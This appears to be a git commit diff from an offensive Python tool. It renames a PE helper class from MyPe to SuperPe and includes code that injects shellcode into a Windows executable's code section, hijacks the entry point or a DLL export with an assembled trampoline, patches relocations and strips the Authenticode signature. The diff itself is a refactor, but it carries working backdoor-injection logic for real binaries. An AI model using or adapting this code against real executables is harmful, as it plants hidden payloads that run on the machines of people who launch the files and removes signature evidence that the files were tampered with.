refactor: mype -> superpe

This commit is contained in:
Dobin
2024-03-01 20:46:52 +00:00
parent 098577d2e5
commit f74bd574b4
6 changed files with 250 additions and 277 deletions
+12 -18
View File
@@ -5,9 +5,8 @@ from intervaltree import Interval, IntervalTree
from model.defs import * from model.defs import *
import pe.pehelper as pehelper import pe.pehelper as pehelper
from pe.superpe import SuperPe from pe.superpe import SuperPe, PeSection
from model.carrier import Carrier from model.carrier import Carrier
from pe.superpe import PeSection
logger = logging.getLogger("ExeHost") logger = logging.getLogger("ExeHost")
@@ -33,7 +32,6 @@ class ExeHost():
# we keep this open # we keep this open
# And modify the EXE through this at the end # And modify the EXE through this at the end
self.pe: pefile.PE = None
self.superpe: SuperPe = None self.superpe: SuperPe = None
self.iat: Dict[str, IatEntry] = {} self.iat: Dict[str, IatEntry] = {}
@@ -54,29 +52,25 @@ class ExeHost():
def init(self): def init(self):
logger.info("--[ Analyzing: {}".format(self.filepath)) logger.info("--[ Analyzing: {}".format(self.filepath))
self.superpe = SuperPe(self.filepath)
pe = pefile.PE(self.filepath) if self.superpe.arch != "x64":
self.pe = pe
self.superpe = SuperPe(pe)
self.superpe.init()
if pe.FILE_HEADER.Machine != 0x8664:
raise Exception("Binary is not 64bit: {}".format(self.filepath)) raise Exception("Binary is not 64bit: {}".format(self.filepath))
self.ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint self.ep = self.superpe.get_entyrpoint()
self.ep_raw = self.superpe.get_physical_address(self.ep) self.ep_raw = self.superpe.get_physical_address(self.ep)
# image base # image base
self.image_base = pe.OPTIONAL_HEADER.ImageBase self.image_base = self.superpe.pe.OPTIONAL_HEADER.ImageBase
# dynamic base / ASLR # dynamic base / ASLR
if pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']: if self.superpe.pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']:
self.dynamic_base = True self.dynamic_base = True
else: else:
self.dynamic_base = False self.dynamic_base = False
# .text virtual address # .text virtual address
self.code_section = pehelper.get_code_section(pe) self.code_section = pehelper.get_code_section(self.superpe.pe)
self.code_virtaddr = self.code_section.VirtualAddress self.code_virtaddr = self.code_section.VirtualAddress
self.code_size = self.code_section.Misc_VirtualSize self.code_size = self.code_section.Misc_VirtualSize
logger.info("---[ Injectable: Chosen code section: {} at 0x{:x} size: {}".format( logger.info("---[ Injectable: Chosen code section: {} at 0x{:x} size: {}".format(
@@ -85,8 +79,8 @@ class ExeHost():
self.code_size)) self.code_size))
# relocs # relocs
if hasattr(pe, 'DIRECTORY_ENTRY_BASERELOC'): if hasattr(self.superpe.pe, 'DIRECTORY_ENTRY_BASERELOC'):
for base_reloc in pe.DIRECTORY_ENTRY_BASERELOC: for base_reloc in self.superpe.pe.DIRECTORY_ENTRY_BASERELOC:
for entry in base_reloc.entries: for entry in base_reloc.entries:
rva = entry.rva rva = entry.rva
base_rva = entry.base_rva base_rva = entry.base_rva
@@ -94,8 +88,8 @@ class ExeHost():
self.base_relocs.append(PeRelocEntry(rva, base_rva, reloc_type)) self.base_relocs.append(PeRelocEntry(rva, base_rva, reloc_type))
# rwx section # rwx section
entrypoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint entrypoint = self.superpe.pe.OPTIONAL_HEADER.AddressOfEntryPoint
for section in pe.sections: for section in self.superpe.pe.sections:
if (section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] and if (section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_READ'] and
section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] and section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_WRITE'] and
section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE'] section.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']
@@ -107,7 +101,7 @@ class ExeHost():
#pe.parse_data_directories() #pe.parse_data_directories()
# IAT # IAT
for entry in pe.DIRECTORY_ENTRY_IMPORT: for entry in self.superpe.pe.DIRECTORY_ENTRY_IMPORT:
for imp in entry.imports: for imp in entry.imports:
dll_name = entry.dll.decode('utf-8') dll_name = entry.dll.decode('utf-8')
if imp.name == None: if imp.name == None:
+35 -35
View File
@@ -12,15 +12,15 @@ from enum import IntEnum
import logging import logging
from helper import hexdump from helper import hexdump
from pe.mype import MyPe from pe.superpe import SuperPe
from model.defs import * from model.defs import *
logger = logging.getLogger("DerBackdoorer") logger = logging.getLogger("DerBackdoorer")
class PeBackdoor: class PeBackdoor:
def __init__(self, mype: MyPe, main_shc: bytes, inject_mode: InjectStyle): def __init__(self, superpe: SuperPe, main_shc: bytes, inject_mode: InjectStyle):
self.mype: MyPe = mype self.superpe: SuperPe = superpe
self.runMode: InjectStyle = inject_mode self.runMode: InjectStyle = inject_mode
self.shellcodeData: bytes = main_shc self.shellcodeData: bytes = main_shc
@@ -31,7 +31,7 @@ class PeBackdoor:
def injectShellcode(self): def injectShellcode(self):
sect = self.mype.get_code_section() sect = self.superpe.get_code_section()
if sect == None: if sect == None:
logger.error('Could not find code section in input PE file!') logger.error('Could not find code section in input PE file!')
return False return False
@@ -48,22 +48,22 @@ Code section size : {sect_size}
offset = int((sect_size - len(self.shellcodeData)) / 2) offset = int((sect_size - len(self.shellcodeData)) / 2)
logger.debug(f'Inserting shellcode into 0x{offset:x} offset.') logger.debug(f'Inserting shellcode into 0x{offset:x} offset.')
self.mype.pe.set_bytes_at_offset(offset, self.shellcodeData) self.superpe.pe.set_bytes_at_offset(offset, self.shellcodeData)
self.shellcodeOffset = offset self.shellcodeOffset = offset
self.shellcodeOffsetRel = offset - sect.PointerToRawData self.shellcodeOffsetRel = offset - sect.PointerToRawData
rva = self.mype.pe.get_rva_from_offset(offset) rva = self.superpe.pe.get_rva_from_offset(offset)
p = sect.PointerToRawData + sect.SizeOfRawData - 64 p = sect.PointerToRawData + sect.SizeOfRawData - 64
graph = textwrap.indent(f''' graph = textwrap.indent(f'''
Beginning of {sect_name}: Beginning of {sect_name}:
{textwrap.indent(hexdump(self.mype.pe.get_data(sect.VirtualAddress), sect.VirtualAddress, 64), "0")} {textwrap.indent(hexdump(self.superpe.pe.get_data(sect.VirtualAddress), sect.VirtualAddress, 64), "0")}
Injected shellcode in the middle of {sect_name}: Injected shellcode in the middle of {sect_name}:
{hexdump(self.shellcodeData, offset, 64)} {hexdump(self.shellcodeData, offset, 64)}
Trailing {sect_name} bytes: Trailing {sect_name} bytes:
{hexdump(self.mype.pe.get_data(self.mype.pe.get_rva_from_offset(p)), p, 64)} {hexdump(self.superpe.pe.get_data(self.superpe.pe.get_rva_from_offset(p)), p, 64)}
''', '\t') ''', '\t')
logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:x}') logger.info(f'Shellcode injected into existing code section at RVA 0x{rva:x}')
@@ -73,8 +73,8 @@ Trailing {sect_name} bytes:
def setupShellcodeEntryPoint(self): def setupShellcodeEntryPoint(self):
if self.runMode == InjectStyle.ChangeEntryPoint: if self.runMode == InjectStyle.ChangeEntryPoint:
rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset) rva = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset)
self.mype.set_entrypoint(rva) self.superpe.set_entrypoint(rva)
logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}') logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}')
return True return True
@@ -101,19 +101,19 @@ Trailing {sect_name} bytes:
logger.critical('Export name not specified! Specify DLL Exported function name to hijack with -e/--export') logger.critical('Export name not specified! Specify DLL Exported function name to hijack with -e/--export')
d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]] d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
self.mype.pe.parse_data_directories(directories=d) self.superpe.pe.parse_data_directories(directories=d)
if self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0: if self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols == 0:
logger.error('No DLL exports found! Specify existing DLL Exported function with -e/--export!') logger.error('No DLL exports found! Specify existing DLL Exported function with -e/--export!')
return -1 return -1
exports = [(e.ordinal, dec(e.name)) for e in self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols] exports = [(e.ordinal, dec(e.name)) for e in self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols]
for export in exports: for export in exports:
logger.debug(f'DLL Export: {export[0]} {export[1]}') logger.debug(f'DLL Export: {export[0]} {export[1]}')
if export[1].lower() == exportName.lower(): if export[1].lower() == exportName.lower():
addr = self.mype.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address addr = self.superpe.pe.DIRECTORY_ENTRY_EXPORT.symbols[export[0]].address
logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:x} . Attempting to hijack it...') logger.info(f'Found DLL Export "{exportName}" at RVA 0x{addr:x} . Attempting to hijack it...')
return addr return addr
@@ -121,13 +121,13 @@ Trailing {sect_name} bytes:
def backdoorEntryPoint(self, addr = -1): def backdoorEntryPoint(self, addr = -1):
imageBase = self.mype.pe.OPTIONAL_HEADER.ImageBase imageBase = self.superpe.pe.OPTIONAL_HEADER.ImageBase
self.shellcodeAddr = self.mype.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase self.shellcodeAddr = self.superpe.pe.get_rva_from_offset(self.shellcodeOffset) + imageBase
cs = None cs = None
ks = None ks = None
if self.mype.arch == 'x86': if self.superpe.arch == 'x86':
cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32 + capstone.CS_MODE_LITTLE_ENDIAN) cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_32 + capstone.CS_MODE_LITTLE_ENDIAN)
ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_32 + keystone.KS_MODE_LITTLE_ENDIAN) ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_32 + keystone.KS_MODE_LITTLE_ENDIAN)
else: else:
@@ -139,33 +139,33 @@ Trailing {sect_name} bytes:
ep = addr ep = addr
if addr == -1: if addr == -1:
ep = self.mype.pe.OPTIONAL_HEADER.AddressOfEntryPoint ep = self.superpe.pe.OPTIONAL_HEADER.AddressOfEntryPoint
ep_ava = ep + self.mype.pe.OPTIONAL_HEADER.ImageBase ep_ava = ep + self.superpe.pe.OPTIONAL_HEADER.ImageBase
data = self.mype.pe.get_memory_mapped_image()[ep:ep+128] data = self.superpe.pe.get_memory_mapped_image()[ep:ep+128]
offset = 0 offset = 0
logger.debug('Entry Point disasm:') logger.debug('Entry Point disasm:')
disasmData = self.mype.pe.get_memory_mapped_image() disasmData = self.superpe.pe.get_memory_mapped_image()
output = self.mype.disasmBytes(cs, ks, disasmData, ep, 128, self.backdoorInstruction) output = self.superpe.disasmBytes(cs, ks, disasmData, ep, 128, self.backdoorInstruction)
# store offset... by calculating it first FUCK # store offset... by calculating it first FUCK
section = self.mype.get_code_section() section = self.superpe.get_code_section()
self.backdoorOffsetRel = output - section.VirtualAddress self.backdoorOffsetRel = output - section.VirtualAddress
if output != 0: if output != 0:
logger.debug('Now disasm looks like follows: ') logger.debug('Now disasm looks like follows: ')
disasmData = self.mype.pe.get_memory_mapped_image() disasmData = self.superpe.pe.get_memory_mapped_image()
self.mype.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3) self.superpe.disasmBytes(cs, ks, disasmData, output - 32, 32, None, maxDepth = 3)
logger.debug('\n[>] Inserted backdoor code: ') logger.debug('\n[>] Inserted backdoor code: ')
for instr in cs.disasm(bytes(self.compiledTrampoline), output): for instr in cs.disasm(bytes(self.compiledTrampoline), output):
self.mype.printInstr(instr, 1) self.superpe.printInstr(instr, 1)
logger.debug('') logger.debug('')
self.mype.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3) self.superpe.disasmBytes(cs, ks, disasmData, output + len(self.compiledTrampoline), 32, None, maxDepth = 3)
else: else:
logger.error('Did not find suitable candidate for Entry Point branch hijack!') logger.error('Did not find suitable candidate for Entry Point branch hijack!')
@@ -179,7 +179,7 @@ Trailing {sect_name} bytes:
registers = ['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi'] registers = ['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi']
if self.mype.arch == 'x86': if self.superpe.arch == 'x86':
registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi'] registers = ['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi']
reg = random.choice(registers).upper() reg = random.choice(registers).upper()
@@ -232,14 +232,14 @@ Trailing {sect_name} bytes:
if len(trampoline) > 0: if len(trampoline) > 0:
encoding, count = ks.asm(trampoline) encoding, count = ks.asm(trampoline)
self.mype.pe.set_bytes_at_rva(instr.address, bytes(encoding)) self.superpe.pe.set_bytes_at_rva(instr.address, bytes(encoding))
relocs = ( relocs = (
instr.address + addrOffset, instr.address + addrOffset,
) )
pageRva = 4096 * int((instr.address + addrOffset) / 4096) pageRva = 4096 * int((instr.address + addrOffset) / 4096)
self.mype.addImageBaseRelocations(pageRva, relocs) self.superpe.addImageBaseRelocations(pageRva, relocs)
self.trampoline = trampoline self.trampoline = trampoline
self.compiledTrampoline = encoding self.compiledTrampoline = encoding
@@ -252,13 +252,13 @@ Trailing {sect_name} bytes:
def removeSignature(self): def removeSignature(self):
addr = self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress addr = self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress
size = self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size size = self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size
self.mype.pe.set_bytes_at_rva(addr, b'\x00' * size) self.superpe.pe.set_bytes_at_rva(addr, b'\x00' * size)
self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0 self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0
self.mype.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0 self.superpe.pe.OPTIONAL_HEADER.DATA_DIRECTORY[PeBackdoor.IMAGE_DIRECTORY_ENTRY_SECURITY].Size = 0
logger.info('PE executable Authenticode signature removed.') logger.info('PE executable Authenticode signature removed.')
return True return True
-199
View File
@@ -1,199 +0,0 @@
import pefile
import capstone
from enum import IntEnum
import logging
from helper import hexdump
logger = logging.getLogger("MyPe")
class MyPe():
IMAGE_DIRECTORY_ENTRY_SECURITY = 4
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
IMAGE_DIRECTORY_ENTRY_TLS = 9
IMAGE_REL_BASED_ABSOLUTE = 0
IMAGE_REL_BASED_HIGH = 1
IMAGE_REL_BASED_LOW = 2
IMAGE_REL_BASED_HIGHLOW = 3
IMAGE_REL_BASED_HIGHADJ = 4
IMAGE_REL_BASED_DIR64 = 10
def __init__(self):
self.pe = None
def openFile(self, infile):
self.pe = pefile.PE(infile, fast_load=False)
self.pe.parse_data_directories()
self.ptrSize = 4
self.arch = self.getFileArch()
if self.arch == 'x64':
self.ptrSize = 8
def getFileArch(self):
if self.pe.FILE_HEADER.Machine == 0x014c:
return "x86"
if self.pe.FILE_HEADER.Machine == 0x8664:
return "x64"
raise Exception("Unsupported PE file architecture.")
def get_code_section(self):
entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
for sect in self.pe.sections:
if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']:
if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.Misc_VirtualSize:
return sect
return None
def get_code_section_data(self) -> bytes:
sect = self.get_code_section()
return bytes(sect.get_data())
def write_code_section_data(self, data: bytes):
sect = self.get_code_section()
self.pe.set_bytes_at_offset(sect.PointerToRawData, data)
def getSectionIndexByDataDir(self, dirIndex):
addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[dirIndex].VirtualAddress
i = 0
for sect in self.pe.sections:
if addr >= sect.VirtualAddress and addr < (sect.VirtualAddress + sect.Misc_VirtualSize):
return i
i += 1
logger.error(f'Could not find section with directory index {dirIndex}!')
return -1
def getRemainingRelocsDirectorySize(self):
relocsIndex = self.getSectionIndexByDataDir(MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC)
out = self.pe.sections[relocsIndex].SizeOfRawData - self.pe.sections[relocsIndex].Misc_VirtualSize
return out
def getSectionIndexByName(self, name):
i = 0
for sect in self.pe.sections:
if sect.Name.decode().lower().startswith(name.lower()):
return i
i += 1
logger.error(f'Could not find section with name {name}!')
return -1
def addImageBaseRelocations(self, pageRva, relocs):
assert pageRva > 0
if not self.pe.has_relocs():
logger.error("No .reloc section")
raise(Exception("No .reloc section"))
imageBaseRelocType = MyPe.IMAGE_REL_BASED_HIGHLOW
if self.arch == 'x64':
imageBaseRelocType = MyPe.IMAGE_REL_BASED_DIR64
logger.info('Adding new relocations to backdoored PE file...')
relocsSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size
relocsIndex = self.getSectionIndexByDataDir(MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC)
addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
sizeOfReloc = 2 * len(relocs) + 2 * 4
if sizeOfReloc >= self.getRemainingRelocsDirectorySize():
self.logger.warn('WARNING! Cannot add any more relocations to this file. Probably TLS Callback execution technique wont work.')
self.logger.warn(' Will try disabling relocations on output file. Expect corrupted executable though!')
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress = 0
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size = 0
return
relocDirRva = self.pe.sections[relocsIndex].VirtualAddress
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[MyPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size += sizeOfReloc
# VirtualAddress
self.pe.set_dword_at_rva(addr + relocsSize, pageRva)
# SizeOfBlock
self.pe.set_dword_at_rva(addr + relocsSize + 4, sizeOfReloc)
logger.info(f'Adding {len(relocs)} relocations for Page RVA 0x{pageRva:x} - size of block: 0x{sizeOfReloc:x}')
i = 0
for reloc in relocs:
reloc_offset = (reloc - pageRva)
reloc_type = imageBaseRelocType << 12
relocWord = (reloc_type | reloc_offset)
self.pe.set_word_at_rva(relocDirRva + relocsSize + 8 + i * 2, relocWord)
logger.info(f'\tReloc{i} for addr 0x{reloc:x}: 0x{relocWord:x} - 0x{reloc_offset:x} - type: {imageBaseRelocType}')
i += 1
## Helpers
def get_entyrpoint(self) -> int:
return self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
def set_entrypoint(self, entrypoint: int):
self.pe.OPTIONAL_HEADER.AddressOfEntryPoint = entrypoint
def write(self, outfile: str):
self.pe.write(outfile)
def disasmBytes(self, cs, ks, disasmData, startOffset, length, callback = None, maxDepth = 5):
return self._disasmBytes(cs, ks, disasmData, startOffset, length, callback, maxDepth, 1)
def printInstr(self, instr, depth):
_bytes = [f'{x:02x}' for x in instr.bytes[:8]]
if len(instr.bytes) < 8:
_bytes.extend([' ',] * (8 - len(instr.bytes)))
instrBytes = ' '.join([f'{x}' for x in _bytes])
logger.debug('\t' * 1 + f'[{instr.address:08x}]\t{instrBytes}' + '\t' * depth + f'{instr.mnemonic}\t{instr.op_str}')
def _disasmBytes(self, cs, ks, disasmData, startOffset, length, callback, maxDepth, depth):
if depth > maxDepth:
return 0
data = disasmData[startOffset:startOffset + length]
for instr in cs.disasm(data, startOffset):
self.printInstr(instr, depth)
if len(instr.operands) == 1:
operand = instr.operands[0]
if operand.type == capstone.CS_OP_IMM:
logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:x}')
logger.debug('')
if callback:
out = callback(cs, ks, disasmData, startOffset, instr, operand, depth)
if out != 0:
return out
if depth + 1 <= maxDepth:
out = self._disasmBytes(cs, ks, disasmData, operand.value.imm, length, callback, maxDepth, depth + 1)
return out
if not callback:
return 1
return 0
+1 -1
View File
@@ -11,7 +11,7 @@ logger = logging.getLogger("PEHelper")
# PEHelper # PEHelper
# Work directly on PE files. Not using mype or other abstractions. # Work directly on PE files. Not using superpe or other abstractions.
# Its mostly used for verification of what we were doing. # Its mostly used for verification of what we were doing.
+188 -9
View File
@@ -1,6 +1,12 @@
from typing import List
import pefile import pefile
import capstone
from enum import IntEnum
import logging
from typing import List
from helper import hexdump
logger = logging.getLogger("superpe")
class PeSection(): class PeSection():
def __init__(self, pefile_section: pefile.SectionStructure): def __init__(self, pefile_section: pefile.SectionStructure):
@@ -9,22 +15,34 @@ class PeSection():
self.raw_size: int = pefile_section.SizeOfRawData self.raw_size: int = pefile_section.SizeOfRawData
self.virt_addr: int = pefile_section.VirtualAddress self.virt_addr: int = pefile_section.VirtualAddress
self.virt_size: int = pefile_section.Misc_VirtualSize self.virt_size: int = pefile_section.Misc_VirtualSize
#self.permissions = pefile_section.Characteristics
class SuperPe(): class SuperPe():
"""Interact with a PE file using pefile""" IMAGE_DIRECTORY_ENTRY_SECURITY = 4
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
IMAGE_DIRECTORY_ENTRY_TLS = 9
def __init__(self, pe: pefile.PE): IMAGE_REL_BASED_ABSOLUTE = 0
self.pe: pefile.PE = pe IMAGE_REL_BASED_HIGH = 1
IMAGE_REL_BASED_LOW = 2
IMAGE_REL_BASED_HIGHLOW = 3
IMAGE_REL_BASED_HIGHADJ = 4
IMAGE_REL_BASED_DIR64 = 10
def __init__(self, infile: str):
self.pe_sections: List[PeSection] = [] self.pe_sections: List[PeSection] = []
self.pe = pefile.PE(infile, fast_load=False)
def init(self):
for section in self.pe.sections: for section in self.pe.sections:
self.pe_sections.append(PeSection(section)) self.pe_sections.append(PeSection(section))
self.pe.parse_data_directories()
self.ptrSize = 4
self.arch = self.getFileArch()
if self.arch == 'x64':
self.ptrSize = 8
##################
def get_section_by_name(self, name: str) -> PeSection: def get_section_by_name(self, name: str) -> PeSection:
for section in self.pe_sections: for section in self.pe_sections:
if section.name == name: if section.name == name:
@@ -46,4 +64,165 @@ class SuperPe():
return None return None
def getFileArch(self):
if self.pe.FILE_HEADER.Machine == 0x014c:
return "x86"
if self.pe.FILE_HEADER.Machine == 0x8664:
return "x64"
raise Exception("Unsupported PE file architecture.")
def get_code_section(self):
entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
for sect in self.pe.sections:
if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']:
if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.Misc_VirtualSize:
return sect
return None
def get_code_section_data(self) -> bytes:
sect = self.get_code_section()
return bytes(sect.get_data())
def write_code_section_data(self, data: bytes):
sect = self.get_code_section()
self.pe.set_bytes_at_offset(sect.PointerToRawData, data)
def getSectionIndexByDataDir(self, dirIndex):
addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[dirIndex].VirtualAddress
i = 0
for sect in self.pe.sections:
if addr >= sect.VirtualAddress and addr < (sect.VirtualAddress + sect.Misc_VirtualSize):
return i
i += 1
logger.error(f'Could not find section with directory index {dirIndex}!')
return -1
def getRemainingRelocsDirectorySize(self):
relocsIndex = self.getSectionIndexByDataDir(SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC)
out = self.pe.sections[relocsIndex].SizeOfRawData - self.pe.sections[relocsIndex].Misc_VirtualSize
return out
def getSectionIndexByName(self, name):
i = 0
for sect in self.pe.sections:
if sect.Name.decode().lower().startswith(name.lower()):
return i
i += 1
logger.error(f'Could not find section with name {name}!')
return -1
def addImageBaseRelocations(self, pageRva, relocs):
assert pageRva > 0
if not self.pe.has_relocs():
logger.error("No .reloc section")
raise(Exception("No .reloc section"))
imageBaseRelocType = SuperPe.IMAGE_REL_BASED_HIGHLOW
if self.arch == 'x64':
imageBaseRelocType = SuperPe.IMAGE_REL_BASED_DIR64
logger.info('Adding new relocations to backdoored PE file...')
relocsSize = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size
relocsIndex = self.getSectionIndexByDataDir(SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC)
addr = self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
sizeOfReloc = 2 * len(relocs) + 2 * 4
if sizeOfReloc >= self.getRemainingRelocsDirectorySize():
self.logger.warn('WARNING! Cannot add any more relocations to this file. Probably TLS Callback execution technique wont work.')
self.logger.warn(' Will try disabling relocations on output file. Expect corrupted executable though!')
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress = 0
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size = 0
return
relocDirRva = self.pe.sections[relocsIndex].VirtualAddress
self.pe.OPTIONAL_HEADER.DATA_DIRECTORY[SuperPe.IMAGE_DIRECTORY_ENTRY_BASERELOC].Size += sizeOfReloc
# VirtualAddress
self.pe.set_dword_at_rva(addr + relocsSize, pageRva)
# SizeOfBlock
self.pe.set_dword_at_rva(addr + relocsSize + 4, sizeOfReloc)
logger.info(f'Adding {len(relocs)} relocations for Page RVA 0x{pageRva:x} - size of block: 0x{sizeOfReloc:x}')
i = 0
for reloc in relocs:
reloc_offset = (reloc - pageRva)
reloc_type = imageBaseRelocType << 12
relocWord = (reloc_type | reloc_offset)
self.pe.set_word_at_rva(relocDirRva + relocsSize + 8 + i * 2, relocWord)
logger.info(f'\tReloc{i} for addr 0x{reloc:x}: 0x{relocWord:x} - 0x{reloc_offset:x} - type: {imageBaseRelocType}')
i += 1
## Helpers
def get_entyrpoint(self) -> int:
return self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
def set_entrypoint(self, entrypoint: int):
self.pe.OPTIONAL_HEADER.AddressOfEntryPoint = entrypoint
def write(self, outfile: str):
self.pe.write(outfile)
def disasmBytes(self, cs, ks, disasmData, startOffset, length, callback = None, maxDepth = 5):
return self._disasmBytes(cs, ks, disasmData, startOffset, length, callback, maxDepth, 1)
def printInstr(self, instr, depth):
_bytes = [f'{x:02x}' for x in instr.bytes[:8]]
if len(instr.bytes) < 8:
_bytes.extend([' ',] * (8 - len(instr.bytes)))
instrBytes = ' '.join([f'{x}' for x in _bytes])
logger.debug('\t' * 1 + f'[{instr.address:08x}]\t{instrBytes}' + '\t' * depth + f'{instr.mnemonic}\t{instr.op_str}')
def _disasmBytes(self, cs, ks, disasmData, startOffset, length, callback, maxDepth, depth):
if depth > maxDepth:
return 0
data = disasmData[startOffset:startOffset + length]
for instr in cs.disasm(data, startOffset):
self.printInstr(instr, depth)
if len(instr.operands) == 1:
operand = instr.operands[0]
if operand.type == capstone.CS_OP_IMM:
logger.debug('\t' * (depth+1) + f' -> OP_IMM: 0x{operand.value.imm:x}')
logger.debug('')
if callback:
out = callback(cs, ks, disasmData, startOffset, instr, operand, depth)
if out != 0:
return out
if depth + 1 <= maxDepth:
out = self._disasmBytes(cs, ks, disasmData, operand.value.imm, length, callback, maxDepth, depth + 1)
return out
if not callback:
return 1
return 0
+14 -15
View File
@@ -8,7 +8,7 @@ from pe.pehelper import *
from model.exehost import * from model.exehost import *
from observer import observer from observer import observer
from pe.derbackdoorer import PeBackdoor from pe.derbackdoorer import PeBackdoor
from pe.mype import MyPe from pe.superpe import SuperPe
from model.project import Project from model.project import Project
from model.settings import Settings from model.settings import Settings
@@ -40,10 +40,9 @@ def inject_exe(
)) ))
return False return False
# MyPe is a representation of the exe file. We gonna modify it, and save it at the end. # superpe is a representation of the exe file. We gonna modify it, and save it at the end.
mype = MyPe() superpe = SuperPe(exe_in)
mype.openFile(exe_in) peinj = PeBackdoor(superpe, main_shc, inject_mode)
peinj = PeBackdoor(mype, main_shc, inject_mode)
if not peinj.injectShellcode(): if not peinj.injectShellcode():
logger.error('Could not inject shellcode into PE file!') logger.error('Could not inject shellcode into PE file!')
@@ -54,12 +53,12 @@ def inject_exe(
return False return False
if source_style == SourceStyle.iat_reuse: if source_style == SourceStyle.iat_reuse:
injected_fix_iat(mype, project.carrier, project.exe_host) injected_fix_iat(superpe, project.carrier, project.exe_host)
if True: if True:
injected_fix_data(mype, project.carrier, project.exe_host) injected_fix_data(superpe, project.carrier, project.exe_host)
mype.write(exe_out) superpe.write(exe_out)
# verify and log # verify and log
shellcode = file_readall_binary(shellcode_in) shellcode = file_readall_binary(shellcode_in)
